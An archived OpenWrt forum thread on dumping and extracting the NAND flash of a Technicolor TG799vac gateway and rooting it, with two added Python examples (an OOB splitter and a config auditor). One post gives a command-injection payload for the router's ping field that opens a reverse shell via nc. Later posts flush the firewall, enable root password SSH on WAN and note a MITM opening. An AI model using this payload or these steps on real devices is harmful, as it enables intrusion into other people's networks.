OpenWrt Forum Archive

Topic: Technicolor TG799vac Dumping Nand Flash ?

The content of this topic has been archived on 23 Apr 2018. There are no obvious gaps in this topic, but there may still be some posts missing at the end.

Ok so I have been trying to dump the contents of a Technicolor TG799vac.

So far I have removed the flash chip, read it out using the DumpFlash.py utility, and used binwalk to locate the SquashFS file system:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
31764480      0x1E4B000       JFFS2 filesystem, big endian
32013764      0x1E87DC4       JFFS2 filesystem, big endian
32058060      0x1E92ACC       JFFS2 filesystem, big endian
32135644      0x1EA59DC       JFFS2 filesystem, big endian
32155244      0x1EAA66C       JFFS2 filesystem, big endian
32162562      0x1EAC302       LZMA compressed data, properties: 0x5D, dictionary size: 16777216 bytes, missing uncompressed size
32162620      0x1EAC33C       LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, missing uncompressed size
32169984      0x1EAE000       JFFS2 filesystem, big endian
32212480      0x1EB8600       JFFS2 filesystem, big endian
32242272      0x1EBFA60       JFFS2 filesystem, big endian
34603034      0x210001A       LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 5191560 bytes
36765696      0x2310000       Squashfs filesystem, little endian, version 4.0, compression:lzma (non-standard type definition), size: 14928222 bytes,  3253 inodes, blocksize: 262144 bytes, created: Tue Jun 28 13:08:22 2016
51709334      0x3150596       xz compressed data
51855814      0x31741C6       xz compressed data
51922474      0x318462A       xz compressed data
52004354      0x3198602       xz compressed data
52046150      0x31A2946       xz compressed data
52047662      0x31A2F2E       xz compressed data
52091472      0x31ADA50       xz compressed data
52093306      0x31AE17A       xz compressed data
52095388      0x31AE99C       xz compressed data
52097286      0x31AF106       xz compressed data
52099504      0x31AF9B0       xz compressed data
52101750      0x31B0276       xz compressed data
52103748      0x31B0A44       xz compressed data
52106574      0x31B154E       xz compressed data
52108628      0x31B1D54       xz compressed data
52110506      0x31B24AA       xz compressed data
52112416      0x31B2C20       xz compressed data
52114650      0x31B34DA       xz compressed data
52116652      0x31B3CAC       xz compressed data
52118514      0x31B43F2       xz compressed data
52118772      0x31B44F4       xz compressed data
52122718      0x31B545E       xz compressed data
52126772      0x31B6434       xz compressed data
52131218      0x31B7592       xz compressed data
52135620      0x31B86C4       xz compressed data
52138550      0x31B9236       xz compressed data
52141480      0x31B9DA8       xz compressed data
52144930      0x31BAB22       xz compressed data
52148772      0x31BBA24       xz compressed data
52152506      0x31BC8BA       xz compressed data
52153220      0x31BCB84       xz compressed data
52153882      0x31BCE1A       xz compressed data
52155856      0x31BD5D0       xz compressed data
52157758      0x31BDD3E       xz compressed data
52159824      0x31BE550       xz compressed data
137736218     0x835B01A       LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 5191560 bytes

Used dd to extract the Image

$ dd  if=Modem.img bs=1 skip=36765696 count=14928222 of=Modem.squashfs
14928222+0 records in
14928222+0 records out
14928222 bytes (15 MB) copied, 22.0777 s, 676 kB/s

Tried to unsquashfs the image:

$ unsquashfs -s Modem.squashfs
Found a valid SQUASHFS 4:0 superblock on Modem.squashfs.
Creation or last append time Tue Jun 28 13:08:22 2016
Filesystem size 14578.34 Kbytes (14.24 Mbytes)
Compression xz
xz: error reading stored compressor options from filesystem!
Block size 262144
Filesystem is exportable via NFS
Inodes are compressed
Data is compressed
Fragments are compressed
Always-use-fragments option is not specified
Xattrs are not stored
Duplicates are Removed
Number of fragments 85
Number of inodes 3253
Number of ids 1

$ unsquashfs -d squash-root1  Modem.squashfs
Parallel unsquashfs: Using 4 processors
Lseek failed because Invalid argument
read_block: failed to read block @0x71eed2525ee8f30e
read_uids_guids: failed to read id table block
FATAL ERROR:failed to uid/gid table

But that failed.
So next I tried to extract with firmware-mod-kit:

$ ./unsquashfs_all.sh ~/projects/Telstra/DumpFlash/Modem.squashfs ~/projects/Telstra/DumpFlash/Squashfs/
Traceback (most recent call last):
  File "./src/binwalk-1.0/src/bin/binwalk-script", line 5, in <module>
    import binwalk
  File "/home/Matthew/projects/Telstra/FMK/src/binwalk-1.0/src/bin/binwalk/__init__.py", line 2, in <module>
    import magic
ImportError: No module named magic
Attempting to extract SquashFS .X file system...


Trying ./src/squashfs-2.1-r2/unsquashfs-lzma... 
Trying ./src/squashfs-2.1-r2/unsquashfs... 
Trying ./src/squashfs-3.0/unsquashfs-lzma... 
Trying ./src/squashfs-3.0/unsquashfs... 
Trying ./src/squashfs-3.0-lzma-damn-small-variant/unsquashfs-lzma... 
Trying ./src/others/squashfs-2.0-nb4/unsquashfs... 
Trying ./src/others/squashfs-3.0-e2100/unsquashfs-lzma... 
Trying ./src/others/squashfs-3.0-e2100/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2-lzma/squashfs3.2-r2/squashfs-tools/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2-hg612-lzma/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2-wnr1000/unsquashfs... 
Trying ./src/others/squashfs-3.2-r2-rtn12/unsquashfs... 
Trying ./src/others/squashfs-3.3/unsquashfs... 
Trying ./src/others/squashfs-3.3-lzma/squashfs3.3/squashfs-tools/unsquashfs... 
Trying ./src/others/squashfs-3.3-grml-lzma/squashfs3.3/squashfs-tools/unsquashfs... 
Trying ./src/others/squashfs-3.4-cisco/unsquashfs... 
Trying ./src/others/squashfs-3.4-nb4/unsquashfs-lzma... 
Trying ./src/others/squashfs-3.4-nb4/unsquashfs... 
Trying ./src/others/squashfs-4.2-official/unsquashfs... Parallel unsquashfs: Using 4 processors

Trying ./src/others/squashfs-4.2/unsquashfs... Parallel unsquashfs: Using 4 processors

Trying ./src/others/squashfs-4.0-lzma/unsquashfs-lzma... Parallel unsquashfs: Using 4 processors

Trying ./src/others/squashfs-4.0-realtek/unsquashfs... Skipping others/squashfs-hg55x-bin (wrong version)...
File extraction failed!

But still no joy :-(

Can anyone offer any advice or maybe point out any mistakes? As I am new to this all and still learning, any tips or pointers would be a great help.

Thanks.

Ok I managed to get it to extract.... Yay

As it turns out when I did the NAND dump I also dumped the OOB part of the NAND.
So I had to run it through Jean-Michel Picod's Nand-dump-tool.py program to separate out the OOB area:

$ python Nand-dump-tool.py -i ModemRaw.img -o Split_seperate.img -I 01f1801d --layout separate

[*] Using given ID code ID code : 01f1801d
Manufacturer : AMD / Spansion
Device : NAND 128MiB 3,3V 8-bit
Die/Package : 1
Cell type : 2 Level Cell
Simultaneously programmed paged : 1
Interleave between multiple chips: False
Write cache : True
Page size : 2048 bytes (2 K)
Spare area size : 16 bytes / 512 byte
Block size : 131072 bytes (128 K)
Organization : X16
Serial access time : 29 ns
OOB size : 64 bytes

[*] Start dumping...
[*] Finished

Total: 138412032 bytes (132.00 MB)
Data : 134217728 bytes (128.00 MB)
OOB : 4194304 bytes (4.00 MB)
Clear: 86.69% of the flash is empty (56813 pages out of 65536)

Once that was done, running it through binwalk again gave me a much more sensible output and an extracted file system:

$ binwalk Split_seperate.img 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
38284         0x958C          SHA256 hash constants, big endian
30801920      0x1D60000       JFFS2 filesystem, big endian
33554458      0x200001A       LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 5191560 bytes
35651584      0x2200000       Squashfs filesystem, little endian, version 4.0, compression:xz, size: 14928222 bytes, 3253 inodes, blocksize: 262144 bytes, created: 2016-06-28 03:08:22
133076364     0x7EE958C       SHA256 hash constants, big endian
133562394     0x7F6001A       LZMA compressed data, properties: 0x5D, dictionary size: 2097152 bytes, uncompressed size: 5191560 bytes
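
Why the first binwalk listing looked like nonsense and the second one made sense comes down to arithmetic on the page geometry the tool reported (2048 data bytes plus 64 OOB bytes per page). The script below is an added example written for this thread, not code from DumpFlash, Nand-dump-tool.py or binwalk; it assumes the raw dump stores each page's 2048 data bytes immediately followed by its 64 OOB bytes. Under that assumption the three signatures that appear in both listings line up exactly, for instance the Squashfs superblock at raw 0x2310000 maps to 0x2200000 in the OOB-stripped image. The four-page sample dump inside it is constructed for the demonstration.

```python
"""Separate the OOB (spare) area from a raw NAND dump and re-map offsets.

Added example for this thread; it is not code from DumpFlash, Nand-dump-tool.py
or binwalk.  Assumption: the raw dump stores every page as its 2048 data bytes
immediately followed by its 64 OOB bytes (the geometry the tool reported for
this chip: page 2048, OOB 64, 65536 pages).
"""
from typing import Optional, Tuple

PAGE_SIZE = 2048               # data bytes per page, from the tool's chip report
OOB_SIZE = 64                  # spare bytes per page, from the tool's chip report
STRIDE = PAGE_SIZE + OOB_SIZE  # 2112 bytes per page in the raw dump

SQUASHFS_MAGIC = b"hsqs"       # little-endian Squashfs superblock magic


def split_oob(raw: bytes, page_size: int = PAGE_SIZE, oob_size: int = OOB_SIZE) -> Tuple[bytes, bytes]:
    """Return (data_image, oob_image) from a dump that interleaves data and OOB per page."""
    stride = page_size + oob_size
    if len(raw) % stride:
        raise ValueError(f"dump length {len(raw)} is not a multiple of {stride}")
    data, oob = bytearray(), bytearray()
    for off in range(0, len(raw), stride):
        data += raw[off:off + page_size]
        oob += raw[off + page_size:off + stride]
    return bytes(data), bytes(oob)


def raw_to_data_offset(raw_off: int, page_size: int = PAGE_SIZE, oob_size: int = OOB_SIZE) -> Optional[int]:
    """Map an offset in the raw dump to its offset in the OOB-stripped image.

    Returns None when the raw offset lies inside a spare area.  Every page
    pushes later content 64 bytes further along in the raw dump, which is why
    binwalk's offsets on the raw image look unrelated to the real layout.
    """
    page, in_page = divmod(raw_off, page_size + oob_size)
    if in_page >= page_size:
        return None
    return page * page_size + in_page


def empty_pages(data: bytes, page_size: int = PAGE_SIZE) -> Tuple[int, int]:
    """Count fully erased (all 0xFF) pages, like the tool's 'Clear:' summary line."""
    blank = b"\xff" * page_size
    total = len(data) // page_size
    erased = sum(1 for i in range(total) if data[i * page_size:(i + 1) * page_size] == blank)
    return erased, total


def build_sample_dump() -> bytes:
    """Constructed 4-page raw dump: pages 0 and 3 erased, page 1 starts with a
    Squashfs magic, page 2 carries filler; every OOB area is 0xAA so it stands out."""
    erased = b"\xff" * PAGE_SIZE
    page1 = (SQUASHFS_MAGIC + b"\x00" * PAGE_SIZE)[:PAGE_SIZE]
    page2 = bytes(range(256)) * (PAGE_SIZE // 256)
    oob = b"\xaa" * OOB_SIZE
    return b"".join(p + oob for p in (erased, page1, page2, erased))


def find_magic(image: bytes, magic: bytes = SQUASHFS_MAGIC) -> int:
    """Offset of the first occurrence of magic in image, or -1."""
    return image.find(magic)


if __name__ == "__main__":
    raw = build_sample_dump()
    data, oob = split_oob(raw)
    print(f"raw {len(raw)} bytes -> data {len(data)} bytes, oob {len(oob)} bytes")
    print("squashfs magic in raw dump at", find_magic(raw),
          "-> data image at", raw_to_data_offset(find_magic(raw)))
    print("erased pages:", empty_pages(data))
    # Offsets taken from the first binwalk listing in the thread (raw dump).
    for raw_off in (31764480, 34603034, 36765696):
        print(f"raw 0x{raw_off:X} -> data 0x{raw_to_data_offset(raw_off):X}")
```

The same mapping explains the earlier failures: the dd extraction started at the correct raw offset, but every 2048 bytes of Squashfs data were interleaved with 64 bytes of spare area, so the superblock parsed while the tables behind it did not.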

I am also interested in looking at hacking this modem, considering how good the hardware is and how readily available they are here in Oz.

I was just wondering if you'd be able to post a copy of the dump? Would be interested in having a look at the filesystem's contents.

Here is a link to the root-fs I extracted https://drive.google.com/open?id=0B7ln9 … WEtX1Z4Rnc
Hopefully the link works.

I have had a slight break from trying to crack this modem but I have ordered a TSOP 48 Socket so I can modify the firmware directly and not have to unsolder and resolder the chip every time.

Hopefully this will yield some results this time around.

Any progress on getting OpenWRT to run ? Would love to open this router up.

I too am watching this, (Just signed up), Telstra NBN FTTN, Australia.

I do like the approach though: cannot JTAG it, so just desolder the chip and dump it.

Not much luck yet. I have pretty much hit a wall with this at the moment, as with the setup I am using I cannot seem to rewrite the modified firmware back to the flash chip, and I don't have any more routers to keep testing with.

Any help would be appreciated.
I have been using ohjeongwook's DumpFlash program to dump and then try to rewrite the flash chip, but it will only write a few blocks and then fails. https://github.com/ohjeongwook/DumpFlash/issues/10

Not sure what to try next now?

Hi Path-E, I have a spare 799vac lying around. Do you want it to continue your work ?

Does anyone have a copy of the firmware or binary? I'd like to try to boot-p flash it.
Cheers!

Unfortunately the firmware files are not publicly available as Telstra automatically pushes the firmware updates.

Just wondering if you managed to get anywhere with this as yet?

Thank you very much CRC.

That post helped a great deal, and now I have Root.

After exploiting the "LAN-side: Command injection in ping" vulnerabilities I was able to re-enable the serial console by running:

$ mount -o remount,rw /

Then modifying the /etc/inittab file by changing

::sysinit:/etc/init.d/rcS S boot
::shutdown:/etc/init.d/rcS K shutdown
#ttyS0::askfirst:/bin/login

to

::sysinit:/etc/init.d/rcS S boot
::shutdown:/etc/init.d/rcS K shutdown
ttyS0::askfirst:/bin/login

BOOM permanent root access.

It appears that article has been removed.
Archived version here >>> https://web.archive.org/web/20170715063 … -gateways/

All that is required is to first start an Ncat listener:

nc -lvvp 10001

Go to the "Diagnostics Ping/Trace" section in the router's web interface and in the "IP Address" field put

:::::::;nc [IP Address of remote machine] 10001 -e /bin/sh

e.g.

:::::::;nc 10.0.0.86 10001 -e /bin/sh

Then "Send Ping Request".
Just make sure that you have port 10001 open in your firewall to allow the connection.

Any chance you could do a dump of the dmesg, and anything else you can find via mtd etc?

Ok, so I figured I'd factory reset mine and try this....

Managed to get a shell, then ran:

mount -o rw,remount /
echo "iptables -F" > /etc/rc.local
echo "dropbear &" >> /etc/rc.local
passwd (set a new root password here)

Then put the device back into bridge mode via the web interface and all is good.

I now wonder what it'd take to get OpenWrt or LEDE on there, seeing as there's a working sysupgrade binary.

In other interesting news, I changed the network config in /etc/config/network to this:

config interface 'lan'
        option type 'bridge'
        option proto 'static'
        option netmask '255.255.255.0'
        option ip6hint '0'
        option ip6assign '64'
        option ipaddr '10.1.1.253'
        option force_link '0'
        list ifname 'eth0'
        list ifname 'eth1'
        list ifname 'eth2'
        list ifname 'wl0'
        list ifname 'wl0_1'
        list ifname 'wl1'
        list ifname 'wl1_1'

config interface 'adsl_wan'
        option type 'bridge'
        option ip6hint '0'
        option force_link '0'
        list ifname 'eth4'
        list ifname 'eth3'
        list ifname 'atm_8_35'
        list ifname 'ptm0'

Now I can run the device in bridge mode, and connect my real router to the port closest to the WAN port (using eth4 doesn't work) and it separates my PPPoE out to the ISP and the bridge between my LAN and wifi.

Happy day.

If you run

strings /etc/cwmpd.db

there are URLs for firmware that can be downloaded.
Also it may be possible for someone with enough time on their hands to roll their own firmware updates? Or at least peek into new ones to find new ways in?

Well, I've had some progress....

I've managed to unlock all the 'tiles' in the device even in bridge mode - Change /www/lua/cards_limiter.lua to:

function M.card_limited(info, cardname)
  -- Display all cards: report every card as not limited, even in bridge mode.
  -- Lua only allows 'return' as the last statement of a block, so it is
  -- wrapped in do ... end to leave the original bridge-mode check below intact.
  do return false end

  if info.bridged then
    return not bridge_limit_list[cardname]
  end
  return false
end

I've also managed to get 2 SIP lines registered and handling calls - although I can't currently get the FXS ports to give a dialtone or anything similar....

That part has me kinda stumped.

The file /rom/usr/lib/cwmpd/transfers/switchover.sh is somewhat interesting... This seems to switch banks in the firmware that gives you a 'preview firmware'. You can run this script again to switch back to your previous image.

When I log in via SSH on this other bank, I get a lovely message saying:

Demo build, unofficial Technicolor SW, not suitable for deployment!

This is on firmware version:

Product: vant-f_telstra_r15-3
Release: Turquoise (15.3)
Version: 15.53.6886-1549011-20160607014710-bc692af66b59291ecba274f6fa4564fb0d8d2a7b

When I switch back to the other bank, I get:

Product: vant-f_telstra
Release: Aqua (16.3)
Version: 16.3.7567-2521030-20170614084458-887a8c777ed8527277d7137ed9149816c889cf1d

Seems like a *VERY* interesting recovery method.

As far as firmware, it all comes from:
https://tg799.technicolor.cwmp.bdms.telstra.net/

Interestingly enough - this option is set:

option ssl_verifypeer '0'

This means it doesn't validate the SSL cert, meaning you can MITM it as well. The Telstra server requires an SSL client cert to let you in, but of course that's on the device (in /etc/ssl/).

Oh, this is cool! I've been lurking this thread for a while now! Thanks for the information!

(Last edited by Cadavrez on 3 Sep 2017, 05:14)

We have this one in Sweden as well, with a slightly different configuration.

root@dsldevice:/bin# cat /etc/banner 
-----------------------------------------------------------------------       
                        ##
                   #########
                 ###########
                #########
               ####                      ##
              ##          ##             ##
      ###########        #####   ####    ##    ####    ## ###     ####    ## ##
   ########   #####       ##   ##    ##  ##  ##    ##  #######  ##    ##  #####
  ########    #######     ##   ##    ##  ##  ##    ##  ##   ##  ##    ##  ###
########      ########    ##   ########  ##  ########  ##   ##  ##    ##  ##
#######        ########   ##   ##        ##  ##        ##   ##  ##    ##  ##
######         #########  ####  ######   ###  ######   ##   ##    ####    ##
  ##            #########
                ######### 
                 ########
                  ####### 
                   #####
-----------------------------------------------------------------------       

Product: vant-w_telenor_r15-4
Release: Crimson (15.4)
Version: 15.53.7451-1761003-20170320115330-9ec66df57f42235f841c0a8657dca23b9dd92fc0


Hash config:         9ec66df57f42235f841c0a8657dca23b9dd92fc0
Hash openwrt:        6009539cb0b11fc3b0ee0b9b9f048f4a84990108
Hash kernel:         d342b8a0f37a4cefc64188a2cd7c8a16694255f4
Hash lte:            cfb1f999e1196e5d1a139d6f298f233a463d5b1a
Hash packages:       e141b58a0befd05b143711f6c249f7cd8dc4278e
Hash mindspeed:      91b6a7a4d703268d6023c3a58da3d33fc62e7ed8
Hash custo:          11b213d6890920cbe4e81fc0bc2bd0ac6e11224f
Hash technicolor:    1a0949c6c363793f48523d2589e3962051d9f0f8

The Telenor/BBB (Bredbandsbolaget) version is already running dropbear by default, as some sort of backdoor entrance for them to SSH in and fix issues. Dropbear is only set up to listen on the WAN port and only allows certain IPs and subnets to connect.

So to fix this you need to change the dropbear configuration (/etc/config/dropbear) to the following during the hack:

config dropbear
    option PasswordAuth 'on'
    option RootPasswordAuth 'on'
    option Port '22'
    option Interface 'wan'
    option Interface 'lan'

Then run "iptables -A INPUT -p tcp --dport ssh -j ACCEPT"

If you want a firmware dump of this version I'll gladly share.
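
Two settings quoted in this thread are worth checking on any unit you pull a config from: `ssl_verifypeer '0'` in the cwmpd config (the ACS connection is then open to interception) and a dropbear section that accepts password logins on the WAN side. The script below is an added example for this thread, not part of the gateway firmware or of any OpenWrt tool; it parses UCI text and reports those weak settings next to a hardened copy. The two sample configs are constructed from the option names quoted above; the section type `cwmpd` and the permissive defaults assumed for a missing `PasswordAuth` / `RootPasswordAuth` are assumptions made for the audit (treating an unset value as permissive is the conservative choice).

```python
"""Flag weak settings in OpenWrt-style UCI config files.

Added example for this thread; it is not part of the gateway firmware or of any
OpenWrt tool.  The two sample fragments are constructed from the option names
quoted in the thread (ssl_verifypeer from the cwmpd config; PasswordAuth,
RootPasswordAuth, Port and Interface from /etc/config/dropbear).  The section
type 'cwmpd' and the hardened values are assumptions for illustration.
"""
import re
from typing import Dict, List, Tuple

Finding = Tuple[str, str, str]  # (severity, section label, message)

# Constructed sample 1: the weak settings as quoted in the thread.
WEAK_CONFIG = """
config cwmpd                      # section type assumed for the example
    option ssl_verifypeer '0'

config dropbear
    option PasswordAuth 'on'
    option RootPasswordAuth 'on'
    option Port '22'
    option Interface 'wan'
    option Interface 'lan'
"""

# Constructed sample 2: the same sections with the settings tightened.
HARDENED_CONFIG = """
config cwmpd
    option ssl_verifypeer '1'

config dropbear
    option PasswordAuth 'off'
    option RootPasswordAuth 'off'
    option Port '22'
    option Interface 'lan'
"""

UCI_LINE = re.compile(r"^(config|option|list)\s+(\S+)(?:\s+'([^']*)'|\s+(\S+))?$")


def parse_uci(text: str) -> List[Dict]:
    """Parse UCI text into sections: {type, name, options, lists, duplicates}."""
    sections, cur = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding blanks
        if not line:
            continue
        m = UCI_LINE.match(line)
        if not m:
            raise ValueError(f"unparsable UCI line: {raw!r}")
        kind, key, quoted, bare = m.groups()
        value = quoted if quoted is not None else bare
        if kind == "config":
            cur = {"type": key, "name": value, "options": {}, "lists": {}, "duplicates": []}
            sections.append(cur)
        elif cur is None:
            raise ValueError("option/list before the first config line")
        elif kind == "option":
            if key in cur["options"]:
                cur["duplicates"].append(key)  # UCI keeps only the last assignment
            cur["options"][key] = value
        else:
            cur["lists"].setdefault(key, []).append(value)
    return sections


def audit(text: str) -> List[Finding]:
    """Return findings for the weak settings discussed in the thread."""
    findings: List[Finding] = []
    for sec in parse_uci(text):
        label = sec["type"] + (f" '{sec['name']}'" if sec["name"] else "")
        opts = sec["options"]
        for key in sec["duplicates"]:
            findings.append(("INFO", label,
                             f"option {key} set more than once; only the last value ({opts[key]!r}) is effective"))
        if opts.get("ssl_verifypeer") == "0":
            findings.append(("HIGH", label,
                             "ssl_verifypeer '0': server certificate is not checked, so the ACS connection can be intercepted"))
        if sec["type"] == "dropbear":
            iface = opts.get("Interface")  # unset means dropbear listens on every interface
            on_wan = iface in (None, "wan")
            # Missing PasswordAuth/RootPasswordAuth are treated as 'on' (assumed permissive default).
            if opts.get("PasswordAuth", "on") == "on" and on_wan:
                findings.append(("HIGH", label, "password SSH login reachable from the WAN side"))
            if opts.get("RootPasswordAuth", "on") == "on":
                findings.append(("MEDIUM", label, "root login with a password is allowed"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"== {name} ==")
        for sev, label, msg in audit(cfg) or [("OK", "-", "no findings")]:
            print(f"{sev:6} {label:10} {msg}")
```

Note the `INFO` finding on the quoted dropbear section: `Interface` appears twice, and UCI keeps only the last assignment, so the parser records `'lan'` as the effective value; that is the kind of detail worth confirming on a live unit with `uci show dropbear` rather than reading off the file.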

Awesome. Let me know if any of the stuff I've documented is different for you - or if you find out further that I can add to it.

While we might not get OpenWrt / LEDE on there, I'm quite happy with the firmware as it is with the extra control. I just wish Technicolor made a 'generic' firmware that didn't require everything to be reverse engineered...

Maybe this could be of some use?
github[dot]com/linusw/linux-technicolor-tg784n-dant-u

It contains patches for the BCM963138 which is in this Technicolor device.

Be careful with what you do on your device. I managed to brick mine, but managed to force a hard reset to get it running again. I got lucky this time!